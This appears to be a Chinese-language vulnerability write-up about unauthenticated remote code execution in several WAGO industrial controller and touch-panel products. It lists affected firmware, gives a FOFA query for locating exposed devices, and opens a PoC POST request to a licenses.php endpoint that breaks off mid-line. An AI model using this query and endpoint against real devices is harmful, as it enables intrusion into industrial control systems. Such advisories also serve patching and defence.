0x01 产品简介
WAGO是一家专业从事电气互连、自动化和接口电子技术的公司。
0x02 漏洞概述
在 WAGO 的多个产品中,一个漏洞允许未经身份验证的远程攻击者创建新用户并更改设备配置,可导致远程RCE、拒绝服务等使整个系统受损。
0x03 影响范围
751-9301 Compact Controller CC100 FW20 <= FW22
751-9301 Compact Controller CC100 FW23
752-8303/8000-002 Edge Controller FW22
750-81xx/xxx-xxx PFC100 FW20 <= FW22
750-81xx/xxx-xxx PFC100 FW23
750-82xx/xxx-xxx PFC200 FW20 <= FW22
750-82xx/xxx-xxx PFC200 FW23
762-5xxx Touch Panel 600 Advanced Line FW22
762-6xxx Touch Panel 600 Marine Line FW22
762-4xxx Touch Panel 600 Standard Line FW22
0x04 复现环境
FOFA:icon_hash="851034826"
0x05 漏洞复现
PoC
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php H
